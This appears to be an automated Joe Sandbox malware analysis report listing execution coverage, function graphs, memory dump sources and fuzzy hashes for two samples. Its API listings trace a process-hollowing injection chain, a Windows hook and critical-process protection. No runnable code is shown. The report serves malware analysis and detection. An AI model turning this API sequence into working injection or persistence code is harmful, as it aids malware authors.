                                                                        • Opcode Fuzzy Hash: 49f21bf0eb262392851cf9525c6e778a5e4f93c4f188cea5696d6bcbb4a4ded3
                                                                        • Instruction Fuzzy Hash: 49D09274A02229CBDB11EF28E8A5B887BB2FB45314F114695E0096B210DB701A84CF81

Execution Graph

Execution Coverage: 8.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 31
Total number of Limit Nodes: 3
execution_graph (node/edge dump omitted; APIs named on the graph, in order of appearance: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, SetWindowsHookExW, RtlSetProcessIsCritical)

Control-flow Graph for the function at 18fb51a (graph rendering omitted; legend: Executed / Not Executed)
APIs
• GetCurrentProcess.KERNEL32 ref: 018FB59E
• GetCurrentThread.KERNEL32 ref: 018FB5DB
• GetCurrentProcess.KERNEL32 ref: 018FB618
• GetCurrentThreadId.KERNEL32 ref: 018FB671
Memory Dump Source
• Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph for the function at 18fb520 (graph rendering omitted; legend: Executed / Not Executed)
APIs
• GetCurrentProcess.KERNEL32 ref: 018FB59E
• GetCurrentThread.KERNEL32 ref: 018FB5DB
• GetCurrentProcess.KERNEL32 ref: 018FB618
• GetCurrentThreadId.KERNEL32 ref: 018FB671
Memory Dump Source
• Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph for the function at 18fb760 (graph rendering omitted; legend: Executed / Not Executed)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FB72E,?,?,?,?,?), ref: 018FB7EF
Memory Dump Source
• Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• RtlSetProcessIsCritical.NTDLL(?,?), ref: 018F6302
Memory Dump Source
• Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
APIs
• RtlSetProcessIsCritical.NTDLL(?,?), ref: 018F6302
Memory Dump Source
• Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
                                                                        • Opcode ID: 5abb9b823c1696edcc3a216b1c3c875ff5ec0ba862f3fa58a3ef93037d6ac701
                                                                        • Instruction ID: 024a40d57445a808504f7a53a0a4217c134f2791cb7ca0536c87e786721e7213
                                                                        • Opcode Fuzzy Hash: 5abb9b823c1696edcc3a216b1c3c875ff5ec0ba862f3fa58a3ef93037d6ac701
                                                                        • Instruction Fuzzy Hash: DA2145B2801259CFDB10CF9AD880BEEBBF4EF59320F14816AE555A3240D338AA44CF61
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FB72E,?,?,?,?,?), ref: 018FB7EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 4f3dc7cec7516d9c2183e6be7bedf6d302cd25fed8d77a342f6a44fae83ed72d
                                                                        • Instruction ID: 4c74eb757f8ada6e0d4ad084d7bdb9cd2611ff188e3cc8b14828630d9e341257
                                                                        • Opcode Fuzzy Hash: 4f3dc7cec7516d9c2183e6be7bedf6d302cd25fed8d77a342f6a44fae83ed72d
                                                                        • Instruction Fuzzy Hash: 8521E6B5900248EFDB10CF9AD584AEEFFF9EB48320F14841AE914A7310D374A944CFA5
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 018F648B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 95aef7e473bcb8d5c2e60654e63ccd9093d51ee425080bce8c6fe0ccd23f0c2f
                                                                        • Instruction ID: 0700566580cf301c3eba2a4b5787d1e744d4c55aa5747b8ab7d9442a6f009bc7
                                                                        • Opcode Fuzzy Hash: 95aef7e473bcb8d5c2e60654e63ccd9093d51ee425080bce8c6fe0ccd23f0c2f
                                                                        • Instruction Fuzzy Hash: 4E2168B1D002099FDB14DFA9D844BEEBBF6EB98320F108419E515A7250C7749A44CFA0
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 018F648B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 6f26852fe24bb74c15a8eb076296138c42a41c34d9ef7947d8284aaa20b5bb6f
                                                                        • Instruction ID: c38917ae29acff141ce7c1e6ec0154256acdd7156da3aff3c326ee39ee48eb5c
                                                                        • Opcode Fuzzy Hash: 6f26852fe24bb74c15a8eb076296138c42a41c34d9ef7947d8284aaa20b5bb6f
                                                                        • Instruction Fuzzy Hash: D62147B1D002099FDB14DFAAC844BEEFBF5EF88320F108419D515A7250D775AA44CFA1

                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:324
                                                                        Total number of Limit Nodes:9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-1537292367
                                                                        • Opcode ID: b93d8b811b8acd146de85d2c33715f0620b62ad509ce60e22003a5769f1d5637
                                                                        • Instruction ID: 237f6e4ca5bb0728339cec6796f53e53e08c2ac7f58d36db62d48922c2b71289
                                                                        • Opcode Fuzzy Hash: b93d8b811b8acd146de85d2c33715f0620b62ad509ce60e22003a5769f1d5637
                                                                        • Instruction Fuzzy Hash: 6C631D74A14619CFCB29DF68C888A9DB7B2FF49311F158599D419AB3A2CB30ED81CF50

Control-flow Graph: basic blocks 82034b8 to 8203d14; no API calls annotated in this function (graph edge list and executed/not-executed coloring omitted)
Strings
Memory Dump Source
• Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
Similarity
• API ID:
• String ID: 4'tq$:$pxq$~
• API String ID: 0-2366959149
• Opcode ID: ddef6a345ff2d3886b16c616b0fd74b9ede5124839d4a059af49769bc78d34c4
• Instruction ID: 47406c7c2a934215ac01677dec5494a2168b19ce465ac1bf790bbe0713f53763
• Opcode Fuzzy Hash: ddef6a345ff2d3886b16c616b0fd74b9ede5124839d4a059af49769bc78d34c4
• Instruction Fuzzy Hash: 6442C375A10218DFDB19CFA9C984B99BBB2FF48304F1580E9E509AB362DB319D91DF10

Control-flow Graph: basic blocks 81b1164 to 81b14b5; CreateProcessA called in block 81b12ff-81b13b9 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B13A6
Memory Dump Source
• Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 9db2fae8195316e139a12f7dd8e36ce49390ab29c3f7daf89b8b41bffe00bed8
• Instruction ID: f41aeaff6a00444faad0a5b92530ffeb97e22711d3adcede214608dfcb3be369
• Opcode Fuzzy Hash: 9db2fae8195316e139a12f7dd8e36ce49390ab29c3f7daf89b8b41bffe00bed8
• Instruction Fuzzy Hash: 9BA19C71D00259DFDF24CFA8C851BEDBBB2BF48311F1585A9E808A7240EB759985CFA1

Control-flow Graph: basic blocks 81b1170 to 81b14b5; CreateProcessA called in block 81b12ff-81b13b9 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B13A6
Memory Dump Source
• Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 1b856d0456c9335721864d99ee4ebaa91ae625a872242b091f354e39325191ce
• Instruction ID: caf238f79ea20ce472369a8bab966a525b25265cf722588f20a5fb531d7bf50e
• Opcode Fuzzy Hash: 1b856d0456c9335721864d99ee4ebaa91ae625a872242b091f354e39325191ce
• Instruction Fuzzy Hash: A3918D71D00259DFDF14CFA8C851BEDBBB2BF48311F1581A9E808A7240EB759985CFA1

Control-flow Graph: basic blocks 109ad68 to 109afe8; GetModuleHandleW called in block 109afa0-109afcb; internal calls to 109a08c, 109a098, 109a0a8, 109a0b8, 109a0c8, 109aff0 and 109b000 (graph edge list and executed/not-executed coloring omitted)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFBE
Memory Dump Source
• Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 482d731980b28945ec8b550cfa6df2e0b1eb64b6589ec851727d0e85342ca7ca
• Instruction ID: 44ce89b0c2327b26530103765e70a4590546033a57bf7fe327bbbd449c356322
• Opcode Fuzzy Hash: 482d731980b28945ec8b550cfa6df2e0b1eb64b6589ec851727d0e85342ca7ca
• Instruction Fuzzy Hash: 72713370A00B05CFDB64DF29D05579ABBF1BF88304F008A6DE48AD7A50DB75E949CBA0

Control-flow Graph: basic blocks 51718e4 to 5171a61; CreateWindowExW called in block 5171973-5171a12 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05171A02
Memory Dump Source
• Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 9cddcdbed4a6def088be87d0a9e8a6a4a31de0703f98992020d5f309ae710208
• Instruction ID: b81516501de4aeaf79c3263340b74f29111e1d946cc504a832e09c28710ae172
• Opcode Fuzzy Hash: 9cddcdbed4a6def088be87d0a9e8a6a4a31de0703f98992020d5f309ae710208
• Instruction Fuzzy Hash: 8951C0B1D00349EFDF14CF99C984ADEBBB5BF48310F24812AE819AB210D7759985CF90

Control-flow Graph: basic blocks 51718f0 to 5171a61; CreateWindowExW called in block 5171973-5171a12 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05171A02
Memory Dump Source
• Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 140ea80132b29b5e5fa6e4879ac2489b28ed7a158be300fa7bde6c5be2706045
• Instruction ID: e79ffb2665070b4182ea39a26f623acb8fd351f429d1913d25289ab1e080eb66
• Opcode Fuzzy Hash: 140ea80132b29b5e5fa6e4879ac2489b28ed7a158be300fa7bde6c5be2706045
• Instruction Fuzzy Hash: 3A4190B1D10349EFDF14CF99C984ADEBBB5BF48310F24852AE819AB210D7759985CF90

Control-flow Graph: basic blocks 10944b4 to 1095a61; CreateActCtxA called in block 10944b4-10959d9 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateActCtxA.KERNEL32(?), ref: 010959C9
Memory Dump Source
• Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 203dfb09d0b854c3876766120427688bcdc12817807a3d94348aaf7946b0985e
• Instruction ID: f10604401c916496009169bf5abaa892d2cd6408c0ab1b1dc1dd3182665391b5
• Opcode Fuzzy Hash: 203dfb09d0b854c3876766120427688bcdc12817807a3d94348aaf7946b0985e
• Instruction Fuzzy Hash: F941FFB0C00729CBDF25DFAAC885B9DBBF5BF48304F20806AD408AB251DB756945DF90

Control-flow Graph: basic blocks 109590c to 1095a61; CreateActCtxA called in block 109590c-10959d9 (graph edge list and executed/not-executed coloring omitted)
APIs
• CreateActCtxA.KERNEL32(?), ref: 010959C9
Memory Dump Source
• Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 97b2393ea0e0bf2e4eaff1d7b48c2a069bdde864374155382f0a6458499c870b
• Instruction ID: e1bcbf92d834d551f5c798a1a619b0db50ababa2c9e0465ce187696693749ad6
• Opcode Fuzzy Hash: 97b2393ea0e0bf2e4eaff1d7b48c2a069bdde864374155382f0a6458499c870b
• Instruction Fuzzy Hash: 1841DEB1C00729CBDB25CFAAC895BDDBBF5BF48304F24846AD448AB250DB796946CF50

Control-flow Graph: basic blocks 5174040 to 517415c; CallWindowProcW called in block 51740da-5174112 (graph edge list and executed/not-executed coloring omitted)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05174101
Memory Dump Source
• Source File: 00000008.00000002.1751557922.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5170000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 7551a9222a5afad1314f83e10748bead5e7381b3a1b91b65b52e918979f214a0
• Instruction ID: 0e5588416fe23fb23777a16df907cb7471af3d0b775d414df612f68f779494ca
• Opcode Fuzzy Hash: 7551a9222a5afad1314f83e10748bead5e7381b3a1b91b65b52e918979f214a0
• Instruction Fuzzy Hash: F84106B5A00349CFCB14CF99C848AAAFBF5FB88314F258459E519AB321D775A841CFA0

Control-flow Graph: basic blocks 81b0ee0 to 81b0fbe; WriteProcessMemory called in block 81b0f46-81b0f85 (graph edge list and executed/not-executed coloring omitted)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B0F78
Memory Dump Source
• Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 4238be936d8463d72ac0a7707075d50a52b2f48f812a4b042facc1f8f99572c6
• Instruction ID: 6775f60fb1b701183240e7041b850a1e86e1d441bfd5bca561732ae819f8f9d8
• Opcode Fuzzy Hash: 4238be936d8463d72ac0a7707075d50a52b2f48f812a4b042facc1f8f99572c6
• Instruction Fuzzy Hash: F72124719002499FCB10CFA9C985BEEBFF5FF48320F14842DE919A7250D7789940CBA5

Control-flow Graph: basic blocks 81b0ee8 to 81b0fbe; WriteProcessMemory called in block 81b0f46-81b0f85 (graph edge list and executed/not-executed coloring omitted)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 081B0F78
Memory Dump Source
• Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: d3c4c1cae133c4e5c294abb1e60686408e7d1b15261aac6e53c1e65969942d64
• Instruction ID: edf0a422e94cb04675f45a66c94d38839fde233163315bc4ce80623f66ca888a
• Opcode Fuzzy Hash: d3c4c1cae133c4e5c294abb1e60686408e7d1b15261aac6e53c1e65969942d64
• Instruction Fuzzy Hash: CE2125719003599FDB10CFAAC981BEEBBF5FF48320F14842EE919A7240D7799940CBA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1678 81b0d49-81b0d9b 1680 81b0dab-81b0ddb Wow64SetThreadContext 1678->1680 1681 81b0d9d-81b0da9 1678->1681 1683 81b0ddd-81b0de3 1680->1683 1684 81b0de4-81b0e14 1680->1684 1681->1680 1683->1684
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 72506d7fbd46ec32d88c4272e72eb3cba3917b20e464006c22f89f6561122433
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b1f7de0ff6a48a6cecbc58af69ce82232e15094707f1adf1f9cad27f7fc547c9
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0109D616,?,?,?,?,?), ref: 0109D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: f3ae4d6590341c76f0fe4cc2467d94d3dd789c4cb82ca1d0b6b09d5d7a6665f0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 081B0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 487ef07f66414e8e5aa05c4bd022e2f49f1e778785f1dfcb5b9388368c1a4a1e
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081B1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: f892d0737910d89c305055fde65a90e71bb7deb4a5e718cd044e9a6428b5ec64
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0109D616,?,?,?,?,?), ref: 0109D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: d0344bda241ada222e0f9e9b15a104aeaaf0d495e3e47447d66745f2f9967cf0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: cbda476083292424b5d10ba0c18e9c159cdd03fb51d3a2290aa066a868570017
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 771ca4ea1a09982558b8ac26348680eb79ea51640e1131a7a6fd52d20df98a0f
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 081B0E96
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 9b48096b8400d881288473abc9db81e5886febe677e010724daaebae50a67120
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 0319a6cf3b48199beddb59f695053a179bcc6a5fc00f2aa2e360a8f8050f923d
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: afb540c731ac4d14e5a0bdf3b2c198622953a230c59539ad5df54c83644210e6
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 081B485D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 7cf9005682b1ef48cd5f5647820f540133a6db65daa38a70947190f3878dd570
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1746513659.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1090000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 9257d41e1c99c8d5f0b9b02e1ca80a5124d17bb6b32ac02cc79f3e7d0e55cf5f
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 081B485D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: c6713012b90e2822edb72747fc1f3330339da203be1bf9940a8fb496968774de
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: bf8d9c92bd627e45edd80e102cab47d48c00597788be15eed19e3a321ffe41a7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 1db93650ad73d66eb6eb6a306bc82b439dde00588f3bf5095336e75424640be7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: 369c695c0928d5266016e73adefe39041e2bdd67a5bc0dae8e078626f20acf95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
